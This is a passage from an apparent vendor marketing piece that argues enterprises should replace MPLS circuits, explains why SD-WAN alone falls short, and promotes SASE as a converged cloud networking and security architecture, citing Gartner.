It’s no secret that MPLS circuits cost a fortune – often 3-4x the price of MPLS alternatives (like SD-WAN) for only a fraction of the bandwidth. But the bottom line isn’t the only factor to take into consideration. Lengthy lead times for site installations (weeks to months), upgrades, and never-ending rounds of support tickets must all factor into the TCO of your MPLS. In short, MPLS is no longer competitively priced for today’s enterprise that needs to move at the speed of business.
B. Employees constantly complain about performance
While traditional hub-and-spoke networking topology comes with its advantages, when users backhaul to the data center they clog the network with bandwidth-heavy applications like VoIP and file transfer. Multiply that by hundreds or thousands of simultaneous users and you choke your network, creating performance problems which IT is tasked to solve. Wouldn’t it be nice if IT was free to solve business-critical issues instead of recurring network performance issues?
C. You’re “going cloud” and migrating from on-prem to cloud DCs and apps
Migrating from on-prem legacy applications to cloud isn’t generally an “if” but a “when” statement. And the traditional hub-and-spoke networking architecture creates too much latency on cloud applications when the goal is ultimately improved network performance. Additionally, optimizing and securing branch-to-cloud and user-to-cloud access can’t be done efficiently with physical infrastructure, instead requiring advanced cloud-delivered cybersecurity solutions like SWG, FWaaS and CASB.
D. IT now needs to support work from anywhere, with no downtime
Prior to COVID, work from anywhere was more the exception than the rule. In the “new normal,” enterprises need the infrastructure to support work from the branch, home, and everywhere else. Traditional remote-access VPNs weren’t designed to support hundreds or thousands of users simultaneously connecting to the network while supporting an optimum security posture, like ZTNA can.
So, should you stay with MPLS or should you go?
Ultimately, it’s time to decide whether to stick with your incumbent MPLS provider or consider the alternatives to MPLS...
Whether it’s cost, digitization, performance or secure remote access - is your MPLS “good enough” to support today’s hassles and headaches (not to mention tomorrow’s)?
2. You’ve decided to look for MPLS alternatives: Do all roads lead to SD-WAN?
You’ve decided that your MPLS isn’t all it's cracked up to be. Now what?
While an SD-WAN solution seems like the natural choice, SD-WAN only addresses some of the challenges that you’ll inevitably face at a growing enterprise.
True, SD-WAN will lower the bill and optimize spend by leveraging internet circuits’ massive capacity and availability everywhere.
However, SD-WAN was designed to optimize performance for site-to-site connectivity, with architecture that isn’t designed to support remote users and clouds.
Additionally, SD-WAN's security is basic at best, lacking the advanced control and prevention capabilities that enterprises need to secure all clouds, datacenters, branches, users, and appliances.
Not to mention, adding SD-WAN to existing appliance sprawl is only going to further complicate your network management, adding more products to administrate, and more hassle surrounding appliance sizing, scaling, distribution, patching and upkeep.
And who needs that headache?
So, how do you solve all the above four challenges, while upgrading your networks and achieving an optimal security posture that allows your enterprise to grow, scale, adjust and stay prepared for “whatever’s next”?
3. Ever Heard of SASE?
No, SASE isn’t just a buzzword or industry hype. It’s the next era of networking and security architecture which doesn’t focus on adding more features to the complicated pile of point solutions, but targets “operational simplicity, automation, reliability and flexible business models” (Gartner, Strategic roadmap for networking, 2019).
According to Gartner, for a solution to be SASE, it must “converge a number of disparate network and network security services including SD-WAN, secure web gateway, CASB, SDP, DNS protection and FWaaS” (Gartner, Hype Cycle for Enterprise Networking 2019). Gartner is extremely clear that these requirements aren’t just “nice-to-have,” but non-negotiables; the solution must be converged, cloud-native, global, support all edges, and offer unified management.
SASE actually combines SD-WAN and security-as-a-service, managed via a single cloud service, which is globally distributed, automatically scaled, and always updated.
So, instead of opting for more network complexity with SD-WAN, plus all the setup, management, sizing, and scaling challenges that come with it – why not consider SASE?
It’s time to think strategically: Move beyond the limitations of SD-WAN
No matter if you need to solve one, two, three or all four of the above WAN challenges, SD-WAN is a short-sighted point solution to any long-term organizational challenge.
This means that only a SASE solution with an integrated SD-WAN which includes a global-private backbone (over costly long-haul MPLS), ZTNA (to serve remote access users and replace legacy VPN) and secure cloud access (which allows you to migrate to the cloud) allows you to successfully grow the business while maintaining your sanity.
If you’re inter